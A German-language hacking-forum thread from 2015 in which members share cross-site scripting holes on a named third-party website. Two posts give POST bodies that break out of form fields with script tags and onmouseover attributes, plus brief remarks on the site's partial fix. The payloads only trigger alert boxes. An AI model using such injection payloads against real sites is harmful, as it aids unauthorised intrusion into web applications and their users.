Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

XSS - refud.me

- - - - -
Erstellt von x4r4x ,

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
x4r4x
Geschrieben 25 October 2015 - 11:09 Uhr

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
    • Likes
    47
  • 46 Beiträge
  • 15 Bedankt 
http://www.refud.me/run.php#steps

Post:

updinvc=0&email=x4r4x@censored.xxx" onmouseover="alert('XSS 02');"&t=<script>alert("XSS 01");</script>&package=0

YChZpkc.png


  • Ch!ller, Framerater, Crap und 2 anderen gefällt das
Thanked by 1 Member:
lNobodyl

#2
Crap
Geschrieben 25 October 2015 - 18:10 Uhr

Crap

    Hacker

  • Premium Member
    • Likes
    261
  • 233 Beiträge
  • 469 Bedankt

Die Usernamebox wurde entfernt und daher ist die XSS Lücke leider nicht mehr möglich.

 

LG


#3
x4r4x
Geschrieben 25 October 2015 - 18:28 Uhr

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
    • Likes
    47
  • 46 Beiträge
  • 15 Bedankt

Danke für den Hinweis.

Eine XSS auf dieser Page bleibt aber dennoch möglich, bzw. in diesem Fall zwei.

 

Habe den Startpost jetzt dementsprechend editiert.


  • lNobodyl gefällt das
Thanked by 1 Member:
lNobodyl

#4
bumg2
Geschrieben 25 October 2015 - 18:42 Uhr

bumg2

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
    • Likes
    67
  • 53 Beiträge
  • 130 Bedankt
  • Android, Android [root], iPhone
  • Linux
Und nun entfernt ihr das E-Mail Feld?
Vielleicht sollte man verzichten die Überprüfung Client basierend zu machen.

SG25KYT.jpg

Bearbeitet von bumg2, 25 October 2015 - 18:52 Uhr.

webapp audits: megalodon, safeloader, acrom, neutrino
malware analyse: pony-1.9 @ tb

#5
Crap
Geschrieben 25 October 2015 - 22:28 Uhr

Crap

    Hacker

  • Premium Member
    • Likes
    261
  • 233 Beiträge
  • 469 Bedankt

Please Login HERE or Register HERE to see this link!


 
Dort gibt es noch 2 Weitere.

updinvc=0&username=crap" onmouseover="alert('XSS 02');"&email=crap@[member='censored'].xxx" onmouseover="alert('XSS 03');"&t=<script>alert("XSS 01");</script>&package=0

updinvc=0&email=x4r4x@[member='censored'].xxx" onmouseover="alert('XSS 02');"&t=<script>alert("XSS 01");</script>&package=0

7FHx7Zg.png

 

LG


  • PaulaAbdul und x4r4x gefällt das
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 67 Mitglied(ern) gelesen


    _)_, and6578, Arthurarsch, Backdoored, BayernFox, Bot4ng, breidi59, bumg2, Bypass, Caruso, Ch!ller, Crap, Creo, Cube, cX., Dean36, Delta, desmond, dos, DR.zydz, easysurfer, Exynos, fAYe, ferithan, Final_war, fly, Framerater, g0rillaz, Goooofy, hacked, Hydra, ice, Injection, izibitzi, Janjij, Kiyoko, Klopfer, lNobodyl, mettbrot, most_uniQue, MultiVitamin, nikita, notfound, o0o, PaulaAbdul, pdr0, rat123, SavE1, scarface, seemoewe, Silent0wn3r, Slixer, smc2014, Smokyjoe, SonnyBlack, Sylax~, Take1T, TeufelsHerr, theunknown, Toskom4n, umarex, vital, vitovice, x4r4x, xl3iitches, zepsus, ZeroFreez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking